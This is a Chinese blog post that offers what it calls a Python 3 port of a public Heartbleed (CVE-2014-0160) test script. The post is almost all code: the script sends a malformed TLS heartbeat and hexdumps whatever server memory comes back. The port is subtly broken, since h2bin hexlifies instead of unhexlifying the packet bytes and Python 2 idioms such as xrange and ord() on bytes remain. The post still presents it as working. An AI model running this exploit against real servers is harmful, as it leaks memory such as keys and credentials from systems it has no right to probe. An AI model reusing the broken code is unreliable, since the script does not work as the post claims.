Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2268580
  • 博文数量: 293
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 2170
  • 用 户 组: 普通用户
  • 注册时间: 2014-03-31 14:30
个人简介

自己慢慢积累。

文章分类

全部博文(293)

分类: Python/Ruby

2019-07-22 15:57:34

网络上测试 OpenSSL Heartbleed漏洞(CVE-2014-0160) 的python脚本都是python2的,和python3不兼容。
修改后如下:
使用:  python ssltest.py 被测试IP  -p 443

  1. #!/usr/bin/python

  2. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  3. # The author disclaims copyright to this source code.

  4. import sys
  5. import struct
  6. import socket
  7. import time
  8. import select
  9. import re
  10. from optparse import OptionParser
  11. import binascii

  12. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  13. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

  14. def h2bin(x):
  15.     #return x.replace(' ', '').replace('\n', '').codecs.encode('hex')
  16.     ttt = x.replace(' ', '').replace('\n', '')
  17.     a_bytes = bytes(ttt, encoding = "utf8")
  18.     return binascii.hexlify(a_bytes)
  19.     #return a_bytes.hex()

  20. hello = h2bin('''
  21. 16 03 02 00 dc 01 00 00 d8 03 02 53
  22. 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
  23. bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
  24. 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
  25. 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
  26. c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
  27. c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
  28. c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
  29. c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
  30. 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
  31. 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
  32. 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
  33. 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
  34. 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
  35. 00 0f 00 01 01
  36. ''')

  37. hb = h2bin('''
  38. 18 03 02 00 03
  39. 01 40 00
  40. ''')

  41. def hexdump(s):
  42.     for b in xrange(0, len(s), 16):
  43.         lin = [c for c in s[b : b + 16]]
  44.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  45.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  46.         print (' %04x: %-48s %s' % (b, hxdat, pdat))
  47.     print

  48. def recvall(s, length, timeout=5):
  49.     endtime = time.time() + timeout
  50.     rdata = b''
  51.     remain = length
  52.     while remain > 0:
  53.         rtime = endtime - time.time()
  54.         if rtime < 0:
  55.             return None
  56.         r, w, e = select.select([s], [], [], 5)
  57.         if s in r:
  58.             data = s.recv(remain)
  59.             # EOF?
  60.             if not data:
  61.                 return None
  62.             rdata += data
  63.             remain -= len(data)
  64.     return rdata
  65.         

  66. def recvmsg(s):
  67.     hdr = recvall(s, 5)
  68.     if hdr is None:
  69.         print ('Unexpected EOF receiving record header - server closed connection')
  70.         return None, None, None
  71.     typ, ver, ln = struct.unpack('>BHH', hdr)
  72.     pay = recvall(s, ln, 10)
  73.     if pay is None:
  74.         print ('Unexpected EOF receiving record payload - server closed connection')
  75.         return None, None, None
  76.     print (' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
  77.     return typ, ver, pay

  78. def hit_hb(s):
  79.     s.send(hb)
  80.     while True:
  81.         typ, ver, pay = recvmsg(s)
  82.         if typ is None:
  83.             print ('No heartbeat response received, server likely not vulnerable')
  84.             return False

  85.         if typ == 24:
  86.             print ('Received heartbeat response:')
  87.             hexdump(pay)
  88.             if len(pay) > 3:
  89.                 print ('WARNING: server returned more data than it should - server is vulnerable!')
  90.             else:
  91.                 print ('Server processed malformed heartbeat, but did not return any extra data.')
  92.             return True

  93.         if typ == 21:
  94.             print ('Received alert:')
  95.             hexdump(pay)
  96.             print ('Server returned error, likely not vulnerable')
  97.             return False

  98. def main():
  99.     opts, args = options.parse_args()
  100.     if len(args) < 1:
  101.         options.print_help()
  102.         return

  103.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  104.     print ('Connecting...')
  105.     sys.stdout.flush()
  106.     s.connect((args[0], opts.port))
  107.     print ('Sending Client Hello...')
  108.     sys.stdout.flush()
  109.     s.send(hello)
  110.     print ('Waiting for Server Hello...')
  111.     sys.stdout.flush()
  112.     while True:
  113.         typ, ver, pay = recvmsg(s)
  114.         if typ == None:
  115.             print ('Server closed connection without sending Server Hello.')
  116.             return
  117.         # Look for server hello done message.
  118.         if typ == 22 and ord(pay[0]) == 0x0E:
  119.             break

  120.     print ('Sending heartbeat request...')
  121.     sys.stdout.flush()
  122.     s.send(hb)
  123.     hit_hb(s)

  124. if __name__ == '__main__':
  125.     main()


阅读(297682) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~